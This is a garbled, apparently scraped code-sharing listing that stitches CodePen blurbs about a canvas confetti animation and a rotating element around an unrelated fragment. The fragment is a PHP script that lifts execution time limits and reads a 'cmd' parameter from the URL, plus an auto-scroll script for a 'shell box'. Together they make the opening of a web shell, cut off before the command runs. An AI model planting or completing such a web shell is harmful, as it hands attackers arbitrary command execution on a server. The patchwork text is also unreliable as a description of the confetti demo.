A vanilla.js canvas confetti animation. Move the mouse to change direction.
A Pen by Linmiao Xu on CodePen.
| <script> | |
| var scroll = setInterval(function(){ window.scrollBy(0,1000); }, 2000); // saves having to refresh page every time shell box is too long | |
| </script> | |
| <?php | |
| ini_set('max_input_time', 0); | |
| ini_set('max_execution_time', 0); | |
| if (!empty($_GET['cmd'])) { | |
| $in = $_GET['cmd']; | |
| $out = ""; |
| true |
A vanilla.js canvas confetti animation. Move the mouse to change direction.
A Pen by Linmiao Xu on CodePen.
A Pen by Matheus Sales on CodePen.
| <div class="caption">Drag to rotate</div> |